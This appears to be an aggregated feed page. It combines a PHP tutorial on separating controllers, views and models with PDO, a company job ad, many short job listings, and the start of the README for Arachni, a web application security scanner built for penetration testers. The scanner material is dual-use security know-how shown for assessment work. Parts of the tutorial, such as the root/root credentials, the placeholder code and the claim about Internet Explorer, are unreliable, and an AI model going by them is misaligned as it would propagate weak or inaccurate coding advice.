DDS collects public record data (e.g., arrest, crash, judicial, etc.) directly from thousands of governmental agencies. This information fuels a number of unique services that are utilized nationally by large and small corporations, a state risk pool, municipalities, educational institutions, hospital systems and insurance underwriters. Our only publicly marketed service is Envision, a comprehensive driver improvement platform. However, most of our growth during the past several years has been driven by a set of predictive underwriting, fraud prevention and claims management services that were created at the request of our customers in the automotive and health care industries.

Data Driven Safety, LLC is dedicated to improving public safety. We have been in existence since 2009 and are owned through the Graham Group, a billion-dollar investment vehicle.

Job Perks: Odd hours celebrated; anywhere in the world acceptable. If you decide to work from our Huntersville office, there's a Jimmy John's right outside. And to eat what you find there, we have a large, private, outdoor patio. Before and after, have some decent espresso (well, iperEspresso) in the kitchen.

Apply: Please include, in your first message, the phrase, "my favorite color is [color]", replacing [color] with any color (doesn't actually have to be your favorite, if that's a secret. Also, find and report the error in the previous sentence. No phone calls, thanks.


          How to write proper PHP

@spaceshiptrooper wrote:

Ok, so this is getting way out of hand. PHP isn't supposed to be this hard, but apparently, it is. Probably because people really love to copy and paste from tutorial websites that are decades old. Tutorial websites ARE the worst websites to learn PHP from. For one, they don't teach you about security at all. And second, they teach you the wrong way, whether you realize it's wrong or not.

So I am going to discuss how to write PHP properly in 2018. I'll be discussing something called Separation of Logic. Some people call this Separation of Concern(s), but I like to call it Separation of Logic. The terms don't really matter right now, so you can use them loosely in this topic. Also, remember that this topic is tailored towards beginners.

Separation of Logic or Separation of Concern(s) is pretty much a method or ideology that separates each piece of logic so that you can manage things more easily. For this topic, we are going to try and "mimic" or "use" the idea of MVC. MVC stands for Model, View, Controller. MVC is a pretty standard industry pattern that many applications use. MVC isn't even just for PHP; you can see MVC in other languages such as C#, Python, and even Ruby. It's not going to be an actual MVC, we are just going to use the idea of it. We are also going to write this topic in procedural style because that's what beginners love to write their PHP in. Short of OO, this is pretty darn close to MVC.

So the first thing we are going to do is determine what kind of action it is. Is it a GET or is it a POST? If it's a GET, what kind of GET is it? Are we going to need the database? This is where we brainstorm and plan how we want our application to work.

Let's start with the basics of this topic. We're pretty much going to plan things out first. Let's decide that we want to make something simple: a Hello World page. So using Separation of Logic, we will separate our controller from our views.

index.php

<?php
// Create our $helloWorld variable
$helloWorld = 'Hello World!';

// Include our index_views.php file
require_once 'index_views.php';

index_views.php

<!DOCTYPE html>
<html>
<head>
<title>First Hello World Page</title>
</head>

<body>
<p><?php print($helloWorld); ?></p>
</body>
</html>

"Why and how does it work?" you may ask. It's very simple. The index.php file does not rely on the view file for the variable to exist. So if, say, the index_views.php file is missing or its name has a typo, all you would really see is a white page. In your error logs, you'll see a file or directory does not exist error, or an open file stream error if the server doesn't have permission to read that file. So in reality, the variable actually gets passed down to the index_views.php file.

We are also using require_once because in PHP, the most abused functions are include and echo. They are also the most misunderstood functions in PHP. There is a difference between include, require, include_once, and require_once. This is why you DO NOT learn from tutorial websites. They are terrible in every aspect.

Let's discuss what the differences are.

include

  • Includes a file.
  • If a file is missing or has a typo, continue with execution.
  • If a file does not have the right permission for the server to read, continue with execution.

require

  • Includes a file.
  • If a file is missing or has a typo, halt execution either right before or exactly at the required line.
  • If a file does not have the right permission for the server to read, halt execution either right before or exactly at the required line.

include_once

  • Does what include does, but does it once if you are including the same file more than once.

require_once

  • Does what require does, but does it once if you are including the same file more than once.

The reason why it is recommended to use require instead of include is because of what is listed for include. You may not know or care about what those listed bullets mean, but it will be to your disadvantage to ignore them.

Let's make a scenario. Say for example, you have something like the below.

index.php

<?php
include 'Scenario.php';

echo $scenario;

Scenario.php

<?php
$scenario = 'What will happen to this variable?';

Ok, so it looks pretty simple, correct? Now, let's say we mistyped Scenario.php and had it as Secnario.php. Notice the c and the e are switched around. Guess what you'll get now? If you installed your development environment correctly and have errors enabled, you'll get an Undefined variable notice along with a file or directory does not exist error. Undefined variable notices refer to variables that are referenced but never actually created. The related Undefined index notice comes from referencing an associative array, like $_POST or $_GET, with an index that does not exist.

But you know for sure that you created the variable $scenario in Scenario.php, correct? Well, that's the thing. That's what include does. Again, look at the second bullet for include. It says continue with execution. This means that even if we mistyped the Scenario.php file name, it will still continue executing. This means that it will try to echo out $scenario. But again, $scenario never really was created, so you'll get the Undefined variable notice.

Now imagine having 500 variables in other files that you are using include for. Guess what you'll be seeing? 500 Undefined variable notices. Now you don't know which file is missing and what is going on. You have looked through all your files and you can't find where the problem started. This is why you don't use include. require will halt exactly at that problem. If Scenario.php doesn't exist, it will stop executing everything. This means that echo $scenario; will never happen. This also gives you a chance to figure out what is going on. Once you have fixed the typo in your require line, the problem will go away and you can continue with your day. That is why we'll be using require_once in this topic.


So let's get back on track. In our first example at the very top, you'll see that we have separated our PHP from our HTML. We have very little PHP in our HTML, and that's what we want. The idea of this method is to separate all the PHP heavy stuff and put it in its own file. We will consider these files as "controllers". Any file that the user accesses directly will be a controller. So if they go to https://localhost/test.php, the file test.php will be considered our "controller". The file index_views.php will be considered our "views". Really though, you don't have to name them as such. Just name them appropriately.


So I have shown you the simple GET scenario where you can implement this method. Let's dig into something a little more complex. Let's say we want to use POST, and in our POST logic, we want to grab data from our database. So let's try it out. We know that we have to make sure the request was made through POST. We aren't going to be using if(isset($_POST[...])) because this is not the correct way of checking for form submission. This is a dirty hack to bypass form submission checking and form validation. if(isset($_POST[...])) will also fail in certain Internet Explorer versions. The correct way is if($_SERVER['REQUEST_METHOD'] == 'POST'). So let's get this underway.

The generic template for this method will look something like this. We basically check to make sure that it's a POST request. If it isn't, do something else. The "something else" can be as simple as redirecting the user back to the original form.

<?php
if($_SERVER['REQUEST_METHOD'] == 'POST') {

} else {

}

We'll be requiring a config file as well. This is for the database information, and we'll also be requiring the model file there. This kind of violates the MVC pattern, but usually you'll have a bootstrap of some sort to load in your model file.

<?php
require_once 'config.php';

if($_SERVER['REQUEST_METHOD'] == 'POST') {

} else {

}

So that's what it'll look like. Let's continue further. In our config.php file, we'll start by creating a few constants for the database information.

<?php
session_start();

define('DB_HOST', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'root');
define('DB', 'test');

That's simple enough. All we pretty much did was start our session and create our constants for our database information. Don't worry, no one cares what my database usernames and passwords are. In PHP, you can create constants in 2 ways.

// First way
define('CONSTANT_NAME', 'constant value');

// Second way
const CONSTANT_NAME = 'constant value';

The second way could originally only be written within classes, but in newer versions of PHP, you can create them outside of classes too. We won't get into what classes are because classes will be difficult to explain to a beginner who still has no clue what the difference between include and require is. The next step is to create the database connection. We'll be doing it in the config.php file.

<?php
session_start();

define('DB_HOST', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'root');
define('DB', 'test');

$options = [
	PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_OBJ,
	PDO::ATTR_ERRMODE => PDO::ERRMODE_WARNING
];

$db = new PDO('mysql:host=' . DB_HOST . ';dbname=' . DB, DB_USERNAME, DB_PASSWORD, $options);

If you did it correctly, you should get a PDO Object () if you do a print_r on the $db variable. print_r is for printing arrays or objects. Again, we won't discuss what objects are either, because that falls under OO, which beginners won't understand a single thing about yet. Let's continue further. We're just going to require the model file inside the config.php file like so.

<?php
session_start();

define('DB_HOST', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'root');
define('DB', 'test');

$options = [
	PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_OBJ,
	PDO::ATTR_ERRMODE => PDO::ERRMODE_WARNING
];

$db = new PDO('mysql:host=' . DB_HOST . ';dbname=' . DB, DB_USERNAME, DB_PASSWORD, $options);

require_once 'model.php';

The reason we are using those options in our PDO connection is that we want to set the default fetch mode to fetch objects, since I am an object oriented person. If you want to fetch arrays, replace PDO::FETCH_OBJ with PDO::FETCH_ASSOC. The difference between these 2 is that FETCH_OBJ sets the default fetch mode to use -> while FETCH_ASSOC sets the default fetch mode to use ['']. Then we set the error mode to raise warnings (ERRMODE_WARNING).
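
To make that difference a bit more concrete, here is a quick throwaway sketch. It is only an illustration and not part of the application we are building; it assumes the files from this topic are in place, and the table and column names are the same made-up ones used in the model file later in this topic.

<?php
// A quick illustration of the two fetch modes. This little test script is only
// for demonstration purposes.
require_once 'config.php';

$prepare = $db->prepare('SELECT someRandomColumn FROM myTable LIMIT 1');

// With PDO::FETCH_OBJ (our default), columns are read with ->
$prepare->execute();
$row = $prepare->fetch(PDO::FETCH_OBJ);

if($row !== false) {
	print($row->someRandomColumn);
}

// With PDO::FETCH_ASSOC, the same column is read with ['']
$prepare->execute();
$row = $prepare->fetch(PDO::FETCH_ASSOC);

if($row !== false) {
	print($row['someRandomColumn']);
}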

So now let's start writing our controller file.

<?php
require_once 'config.php';

if($_SERVER['REQUEST_METHOD'] == 'POST') {

	// Validation here
	if(!isset($_POST['grab']) OR empty($_POST['grab'])) {

		// Just set 1 to this error.
		// There's nothing really special with this variable other than creating it
		// And we'll be referencing it in a little bit.
		$_SESSION['grab_error'] = 1;

		header('Location: index.php'); // Redirect to our index file
		die(); // Die will ignore everything after

	} else {

		print_r($_POST['grab']);

	}

} else {

	require_once 'index_views.php';

	if(isset($_SESSION['grab_error'])) {
		unset($_SESSION['grab_error']);
	}

}

So you typically don't want to print to the screen in a controller, but we're going to do it for testing purposes. I also said not to use if(isset($_POST[...])) before. The only time if(isset($_POST[...])) is acceptable, and an exception, is during form validation. Form validation and form submission checking are 2 different things. Form submission checking is meant to check if the form was submitted. Form validation is to validate that the field contains what you want it to contain. For instance, if you have a field for someone's first name, you obviously don't want it to have numbers, do you? That's where "form validation" comes in. Using if(isset($_POST[...])) during this time is appropriate because someone might modify the HTML on their side. By not checking whether these fields exist, you will end up with Undefined index errors if someone happens to modify the page on their side. So this is the only time using if(isset($_POST[...])) is an exception.
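
As an aside, here is one minimal sketch of what that validation could look like for our single "grab" field; it is the kind of code that would go where the finished controller below says to validate "grab" first. The allowed characters and the length limit are just assumptions for illustration, not something this walkthrough prescribes.

<?php
// A minimal validation sketch for the "grab" field (assumes config.php, which
// starts the session, has already been required like in the controller above).
// The allowed pattern and the 50 character limit are assumptions; change them
// to whatever your field actually needs.
if(isset($_POST['grab']) && is_string($_POST['grab']) && preg_match('/^[A-Za-z0-9 ]{1,50}$/', $_POST['grab'])) {

	$grab = $_POST['grab'];

} else {

	$_SESSION['grab_error'] = 1;

	header('Location: index.php'); // Redirect to our index file
	die(); // Die will ignore everything after

}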

We are also unsetting the grab_error session after including the index_views.php file so that when the user refreshes the page, the error message is gone. It doesn't make sense to keep the error message there when the user refreshes the page and hasn't done anything else.

Now let's continue with our index_views.php file.

<!DOCTYPE html>
<html>
<head>
<title>Grab something from the database</title>
</head>

<body>
<?php
if(isset($_SESSION['grab_error'])) {
?>
<p>Please type something into the "grab" text field.</p>
<?php
}
?>

<form action="//<?php print(htmlspecialchars($_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'], ENT_QUOTES)); ?>" method="POST">
	<input type="text" name="grab" placeholder="Type something into this field."><br>
	<button type="submit">Submit</button>
</form>
</body>
</html>

So in this view file, we are pretty much checking to see if the grab_error session is set. If it is, we display a custom message to the user. We then create our form. We'll "try" to guess what the URL is, running it through htmlspecialchars because you should never print raw request data straight into your HTML. You can leave the action attribute empty, but I believe it is best to put a URL there. So when you type something into the "grab" text field, you'll get a POST array with the field grab as an index.

Ok, the next step is to remove the print_r in our controller file and start using our model file to grab data. So let's create our model file.

<?php
function grabData($db, $string) {

	$sql = 'SELECT someRandomColumn, anotherRandomColumn, whyNotAnotherOne FROM myTable WHERE someRandomColumn = :string';
	$prepare = $db->prepare($sql);
	$parameters = [
		':string' => $string
	];

	$prepare->execute($parameters);

	if($prepare->rowCount()) {

		return $prepare->fetchAll();

	} else {

		return false;

	}

}

So in our model file, we pretty much create a function called grabData. This function requires 2 arguments. The first argument is our database connection and the second argument is the string that we want to use from our text field. We are also using Prepared Statements because we are dealing with user inputs. It is always best to use Prepared Statements when dealing with queries that have WHERE, SET, and INSERT in them. These are the queries that will have user input. Stop using ->query or _query. THIS IS UNSAFE to use when dealing with user inputs.
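
Just to show how the function is meant to be called on its own, here is a tiny throwaway test script. It is only an illustration (the search value is made up); the real call happens in the controller below.

<?php
// Hypothetical quick test of the model function. config.php starts the session,
// creates $db and requires model.php for us, so grabData() is available.
require_once 'config.php';

$rows = grabData($db, 'some value to search for');

if($rows === false) {

	print('No matching rows.');

} else {

	foreach($rows as $row) {
		// The default fetch mode is FETCH_OBJ, so columns are object properties
		print($row->someRandomColumn . ' - ' . $row->anotherRandomColumn . PHP_EOL);
	}

}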

Ok, so we have our model file created, let's implement the very last step in our controller file and we should have everything working.

<?php
require_once 'config.php';

if($_SERVER['REQUEST_METHOD'] == 'POST') {

	// Validation here
	if(!isset($_POST['grab']) OR empty($_POST['grab'])) {

		// Just set 1 to this error.
		// There's nothing really special with this variable other than creating it
		// And we'll be referencing it in a little bit.
		$_SESSION['grab_error'] = 1;

		header('Location: index.php'); // Redirect to our index file
		die(); // Die will ignore everything after

	} else {

		// Validate "grab" first.
		// Assuming you already did.
		$grab = ....;

		$returned = grabData($db, $grab);
		if($returned == false) {

			// The returned result is false.
			// Do something else like give the user a 404 error page or give them an error message.

		} else {

			require_once 'returned_result.php';

		}

	}

} else {

	require_once 'index_views.php';

	if(isset($_SESSION['grab_error'])) {
		unset($_SESSION['grab_error']);
	}

}

So as you can see, assuming you have already done your validations, all we really do differently is run the grabData function. We pass in $db from our config.php because the variable $db is in scope at this point, since we required the config.php file. Then we check to see if the result returned false. If it returned false, that means the string the user typed doesn't exist within the database. If it did exist, it would trigger the else statement and run the require_once line.
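
The walkthrough never shows returned_result.php, so here is one minimal sketch of what that view could look like. The markup and layout are assumptions; only the $returned variable and the column names come from the code above.

returned_result.php

<!DOCTYPE html>
<html>
<head>
<title>Search results</title>
</head>

<body>
<ul>
<?php
// $returned comes from the controller: an array of row objects from grabData()
foreach($returned as $row) {
?>
<li>
	<?php print(htmlspecialchars($row->someRandomColumn)); ?> -
	<?php print(htmlspecialchars($row->anotherRandomColumn)); ?> -
	<?php print(htmlspecialchars($row->whyNotAnotherOne)); ?>
</li>
<?php
}
?>
</ul>
</body>
</html>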

This method is fairly close to MVC. If you take a look at CodeIgniter, you'll see something that's similar.

public function index() {

	$this->load->model('ModelName');

	$this->ModelName->grabData($db, $grab);

}

Do you see anything different between our model call and CodeIgniter's? Other than the OO style, it's pretty much the same. CodeIgniter still needs to load the model file, and within the model file, you have the function grabData. It still requires the same set of arguments. Though if you are using a proper MVC application, you don't need to pass the $db connection anymore because you'll most likely be able to load the $db connection from within the model file itself. So you'll only need 1 argument for the model call.


So, pretty much wrapping this topic up, we separate all 3 concerns and we end up with a much cleaner working environment that we can manage much more smoothly.

  • Separate the PHP heavy stuff into the controllers.
  • Separate the HTML stuff into the views.
  • Separate the database calls into the models.

This pretty much runs like an MVC application. And in the future, if you happen to want to switch from this kind of method to a real MVC framework, you can transition without a problem because you'll already have the mindset of how it's supposed to work. You would just need to learn OO. You can also use PHP in your views as well. Just keep it minimal; anything PHP heavy, like moving files or creating files, would have to go in the controllers.

Posts: 1

Participants: 1



          Introduction to database joins with mariadb and mysql join examples

LinuxConfig: In this tutorial we will see the different types of joins available when using MySQL or MariaDB.


          Uniface Developer - Oscar Technology - Rossendale
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          Web Developer
Web Developer Salary: DOE + benefits Type: Full time Location: Bodmin Our client is expanding over the next 12 months and is looking to recruit more developers to join their in-house development team, located in Bodmin. We are looking for proactive developers to come in and support the Lead Developer. Purpose of the role Play an instrumental part in the expansion of both the web services department and also the development towards public launch of a SaaS product. Responsibilities Ensure timely and accurate delivery of work packages to customers Ensure produced development work is tested and functions as required across all platforms (quality control) Take responsibility for delivered work/projects and ensure customer happiness Ensure maintenance of existing code base Ensure development practices and processes are efficient Apply knowledge and experience to ensure that we are following best practices and making things the best they can be Ensure all time spent on projects is recorded accurately Skills & Experience required A critical eye for web design and application development Excellent verbal and written communication skills Wide ranging experience of programming and development in a commercial environment An understanding of and desire to use good software engineering practices Ability to solve problems, overcome obstacles and take things to completion Strong PHP, CSS, HTML and Javascript skills with underlying programming knowledge that can be applied to any language Experience of REST APIs and good experience of MySQL Time management ability and awareness If you would be interested in applying for this position please send an up to date CV detailing your skills and experiences. All applications are confidential and will be treated with the strictest confidence.
          Drupal.org security advisory coverage applications: [D7] Views custom table

The View custom table module provides functionality to integrate your custom table data into Views and to access all of its columns in Views. The module uses hook_view_data to add custom tables to Views. It provides the following functionality:

  1. Auto integrate custom table data to views
  2. Auto map MySQL data types to Drupal data types
  3. Extend relationships of custom table data to Drupal entities

Project link

https://www.drupal.org/project/view_custom_table

Git instructions

git clone --branch 7.x-1.x git@git.drupal.org:project/view_custom_table.git


          Softwarová sklizeň (11. 7. 2018)
[1 minute read] A probe into the world of open source software. Today we'll talk about a tool for creating databases, iron out a few software bugs, try out an interesting web browser, and cover an application for e-reading devices. The database tool lets you create databases in a few simple steps with the help of a graphical wizard. At the moment it supports only PostgreSQL databases, but the upcoming version plans to add support for MySQL, MariaDB and SQLite as well. It provides a set of generators for producing Qt/C++ code and user forms, and can be extended with more.
          Integration Architect - Silverline Jobs - Casper, WY
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Casper, WY jobs
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. Do you want to be part of a fast paced environment, supporting the growth of cutting edge...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          Integration Architect - Silverline Jobs - Cheyenne, WY
Strong understanding of relational databases structure and functionality and experience with all major databases - Microsoft SQL Server, MYSQL, postgreSQL or...
From Silverline Jobs - Tue, 10 Jul 2018 00:33:35 GMT - View all Cheyenne, WY jobs
          Technical Architect (Salesforce experience required) Cheyenne - Silverline Jobs - Cheyenne, WY
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. Do you want to be part of a fast paced environment, supporting the growth of cutting edge...
From Silverline Jobs - Fri, 30 Mar 2018 06:14:53 GMT - View all Cheyenne, WY jobs
          Expert In Zend Framework!
Need some one who can debug my website 2-3 issue very quickly. Thanks (Budget: ₹600 - ₹1500 INR, Jobs: CakePHP, MySQL, PHP, Symfony PHP, Zend)
          Sr Software Developer (Mobile App - Reactive) (7491258) - emergiTEL Inc. - Burnaby, BC
.net core/Java for middleware, MS SQL/MySQL RDS. Leads design, development and documentation of a complex and comprehensive product suite.... $80,000 - $100,000 a year
From EmergiTel Inc. - Wed, 20 Jun 2018 06:49:20 GMT - View all Burnaby, BC jobs
          Software Developer Analyst - Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:19 GMT - View all Burnaby, BC jobs
          Senior Software Developer Analyst Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:18 GMT - View all Burnaby, BC jobs
          Similar advertisement engine like Google Adwords and Adsense      Cache   Translate Page   Web Page Cache   
Hello. PLEASE BID AND QUOTE THE RIGHT PRICE AT WHICH YOU CAN OFFER THIS; DO NOT QUOTE LOW AND THEN START DISCUSSING. I need an advertisement engine exactly similar to Google AdWords and AdSense; further info you can search for yourself ... (Budget: €750 - €1500 EUR, Jobs: HTML5, MySQL, Objective C, PHP, Website Design)
          Software Engineer      Cache   Translate Page   Web Page Cache   
Posted on: 2018-07-11

Software Engineer (Corona, CA) Determine & lead project dvlpmnt direction. Prep & organize specifications for new features & modules. Job reqs high school diploma or eqvlnt & 8 yrs progressive exp in offered job (Sftwre Eng). Must have 8 yrs exp w/: C/C++, Visual C++, Java, C#, Python, Ruby, Matlab, Windows, Unix, Linux, MFC, Win32, STL, .Net Framework, OpenCV, SQLite, MS-SQL, Oracle, MySQL, XML, JSON, OOD, OOP, Network, Security, Multi Thread, Multimedia Technology, Image Process'g, Stream'g, HTML, CSS, JavaScript, PHP, ASP.NET, Ajax, Ruby on Rails. Must have 4 yrs exp w/: Objective-C; Mac OS X, iOS, Android, Windows Phone, Core Data, Cocoa, CocoaTouch. Mail cvr ltr & CV to: Jodi Reining, ABS Finance Company, LLC, 341 Corporate Terrace, Corona, CA 92879
recblid l697o25pjxc9nkwxw3wwgcvfawixpl


          Need an Advisor for IT Firm on project basis, to work and complete the given task and advise regulary      Cache   Translate Page   Web Page Cache   
Need an advisor for an IT firm on a project basis, to work on and complete the given tasks and advise regularly. Need PHP, MySQL, WooCommerce, CodeCanyon, Android app, designing, etc. I can't pay much, so if you can work... (Budget: ₹1500 - ₹12500 INR, Jobs: HTML, MySQL, PHP, Website Design, WordPress)
          Fix a Broken Wordpress Website      Cache   Translate Page   Web Page Cache   
Hello. I recently moved hosting companies and my WordPress website is now broken after the move to the new hosting provider. I can provide you with a backup of the website and database. I have tried to get the website to work, but all I get is an HTTP Error 500... (Budget: $30 - $250 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Hackeru International is looking for a lecturer in Android and iOS application development      Cache   Translate Page   Web Page Cache   
Hackeru, the leading company in high-tech education, is looking for a lecturer in Android and iOS application development with comprehensive expertise in both server and client. Requirements: experience in application development - mandatory; teaching experience - mandatory; previous experience in a similar or identical role - an advantage. Proficiency at a teaching level is required in: iOS application development, HTML and HTML5, CSS 3.0, .NET, JavaScript, Bootstrap, jQuery, JS, Angular, MySQL, Java, Swift.
          First class of new graduates! Engineers, give us everything you have in a single interview! by 株式会社スターファクトリー      Cache   Translate Page   Web Page Cache   
Star Factory is now in its fourth year, and we are finally ready to welcome new members! One designer and one client programmer have already been confirmed to join. Engineers graduating in 2019: won't you join us as the third member of our first class of new graduates? Our senior staff are all veterans with many years in the game industry, so this is without question an environment where you can grow. Instead of a narrow, siloed scope of work, you can work with the speed and the broad discretion that only a small venture offers. That does not mean being left on your own: if you ask for help, someone will always lend a hand, and the company culture makes it easy to speak up. What matters most is the desire to grow. With an average age of 36, our company has an inverted age pyramid for a venture, so please bring in a fresh breeze! Let's create sparkling work that excites the world together! Note that our interview process is a single round only, so give it everything you have! Facebook page: https://www.facebook.com/starfactory.inc.inc/ [Who we are looking for] People who enjoy teamwork! People who love having fun! People who want to grow fast! People who, if possible, can work part-time with us after receiving an offer! [Job description] * Server-side engineer: server-side development and design for online services; infrastructure design, construction and operation for online services; performance tuning. * Client programmer: design and development of game clients; design and development of tools, libraries and frameworks; design and construction of the development environment. [Development environment and languages] Server side: JavaScript, Node.js, MySQL, Redis. Cloud services: Amazon Web Services (AWS). Game client: C#, C++, Swift, Java. Game engine: Unity. Source control: GitHub. Chat: Slack
          English × Infrastructure! Wanted: an engineer to support the core of Avinton! by Avintonジャパン株式会社      Cache   Translate Page   Web Page Cache   
[We are recruiting for a valuable position that protects and improves the foundations of our systems in a global environment.] As the engineer in this role you will take end-to-end responsibility, from failure analysis through to recovery, for the infrastructure that runs our in-house big data analysis solution and our machine learning programs. In the course of understanding these up-to-date solutions, built from a wide range of technologies, you can acquire a broad skill set. A perfect fit for: people with infrastructure experience, whether servers or networks; people with technical support experience; people with experience using Oracle/Linux/MySQL; people comfortable working in English. The team includes members from the UK, Hungary and other countries, each with a great deal of individual discretion, in an environment where you can grow. If you are interested, please apply via "I want to hear more". We look forward to your application.
          OK, dumb but. how do you pronounce MySQL?      Cache   Translate Page   Web Page Cache   
none
          Downgrade mysql 5.7.21 to 5.5.53 advisable?      Cache   Translate Page   Web Page Cache   
none
          MySQL or MariaDB or PostgreSQL?      Cache   Translate Page   Web Page Cache   
none
          mySQL column limit      Cache   Translate Page   Web Page Cache   
max number / size
          PHP Developer (Tamil Nadu)      Cache   Translate Page   Web Page Cache   
PTC - Aviation Academy - Date posted: 11 Jul 2018
We require a PHP Developer for an upcoming web development company. Job profile: integration of user-facing elements developed by front-end developers; solve complex performance problems and architectural challenges. Requirements: should have 2+ years of experience in PHP with a strong hand in the MVC concept; must have knowledge of the CodeIgniter framework; Magento, Joomla, WordPress preferred; good knowledge of the MySQL database; experience developing and maintaining dynamic websites; working knowledge of front-end technologies like HTML5, CSS3, and JavaScript/jQuery. Salary Rs.15,000 to Rs.20,000. Location: Chennai (Anna Nagar). Day Shift...
          PHP Developer      Cache   Translate Page   Web Page Cache   
Evaluate Solution Services - Mohali, Punjab - Chandigarh - Dear candidate, Job Title: Sr PHP Developer. Functional Area: |IT Software | Software Products & Services| Specializations: ||UI.... Should have a minimum of 3 years of experience in PHP with a strong hand in core PHP, MVC frameworks, CakePHP, CodeIgniter. Should have good experience with MySQL...
          Full Stack React/Node developer      Cache   Translate Page   Web Page Cache   
Hi. I am a developer as well, and I currently have several projects running, so I cannot handle more. One of my clients wants to hire someone else who can take over the project and work closely with me... (Budget: $3000 - $5000 USD, Jobs: Angular.js, MySQL, node.js, PHP, React.js)
          Project for Azad V.      Cache   Translate Page   Web Page Cache   
Hi Azad V., I noticed your profile and would like to offer you my project. We can discuss any details over chat. (Budget: €170 EUR, Jobs: Hire me, HTML, Javascript, MySQL, PHP, WordPress)
          Full-Stack Java Developer - STEL Solutions - Murcia, Spain      Cache   Translate Page   Web Page Cache   
We are looking for talent to join the development team of the company's flagship product, STEL Order (www.stelorder.com), the best-rated cloud and mobile management and invoicing software. Requirements: experience developing back-end systems with Java J2EE and Apache Tomcat; experience working with database servers (MySQL and JPA); experience developing front-ends for web applications (HTML, CSS, JavaScript, jQuery and AJAX). ...
          Magento Developer - (Magento/PHP7)      Cache   Translate Page   Web Page Cache   
MA-Boston, If you are a Magento Developer looking for a new job opportunity, read on! We are an ecommerce company based in Somerville, and we have one of the sharpest teams around! Currently we are looking for a Software Engineer who has worked with the most recent versions of Magento and PHP, while also working with Laravel and MySQL. Apply now! What You Need for this Position: At least 3 years of experience
          PROBLEM WITH MYSQL      Cache   Translate Page   Web Page Cache   
Good morning, I have a problem with my site; this message appears: Fatal error: Call to undefined method _WP_Editors::enqueue_default_editor() in /var/www/vhosts/nauticashark.it/httpdocs/wp-includes/general-template.php on line 3115. What can I do?
          Intro to Databases (MySQL, CloudKit, Firebase, Core Data, Realm)      Cache   Translate Page   Web Page Cache   
Get an intro to popular database options used for iOS app development like MySQL, CloudKit, Firebase, Core Data and Realm. Quick Jump Links 00:28 – MySQL 05:16 – CloudKit 10:49 – Firebase Database 13:45 – Core Data 17:20 – Realm Database Come and learn iOS programming with us! If you want to increase your chances […]
          need andriod and php developer      Cache   Translate Page   Web Page Cache   
Need an Android and PHP developer for my app & site (Budget: ₹600 - ₹1500 INR, Jobs: Android, iPhone, Mobile App Development, MySQL, PHP)
          Commission free and mobile friendly online booking system and channel manager for hotels      Cache   Translate Page   Web Page Cache   
I am looking for an application like beds24.com. The web app has to be identical and should have features exactly like beds24.com. Please read https://wiki.beds24.com carefully before you bid! I am... (Budget: €250 - €750 EUR, Jobs: CSS, HTML, Javascript, MySQL, PHP)
          Create a war type of project from a given online tutorial example - and make it work with tomcat and on browser.      Cache   Translate Page   Web Page Cache   
Hi, this is for educational purposes. We would like to create a WAR-type project from a RESTful server based on the following example: https://www.concretepage.com/spring-boot/spring-boot-security-rest-jpa-hibernate-mysql-crud-example... (Budget: $10 - $20 AUD, Jobs: J2EE, Java, Linux, MySQL, node.js)
          GitHub - Arachni/arachni: Web Application Security Scanner Framework      Cache   Translate Page   Web Page Cache   

README.md

Arachni logo

Synopsis

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

Note: Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc. with the addition of custom components.

Arachni offers:

A stable, efficient, high-performance framework

Check, report and plugin developers are allowed to easily and quickly create and deploy their components with the minimum amount of restrictions imposed upon them, while provided with the necessary infrastructure to accomplish their goals.

Furthermore, they are encouraged to take full advantage of the Ruby language under a unified framework that will increase their productivity without stifling them or complicating their tasks.

Moreover, that same framework can be utilized as any other Ruby library and lead to the development of brand new scanners or help you create highly customized scan/audit scenarios and/or scripted scans.

Simplicity

Although some parts of the Framework are fairly complex, you will never have to deal with them directly. From a user's or a component developer's point of view, everything appears simple and straightforward, all the while providing power, performance and flexibility.

From the simple command-line utility scanner to the intuitive and user-friendly Web interface and collaboration platform, Arachni follows the principle of least surprise and provides you with plenty of feedback and guidance.

In simple terms

Arachni is designed to automatically detect security issues in web applications. All it expects is the URL of the target website and after a while it will present you with its findings.

Features

General

  • Cookie-jar/cookie-string support.
  • Custom header support.
  • SSL support with fine-grained options.
  • User Agent spoofing.
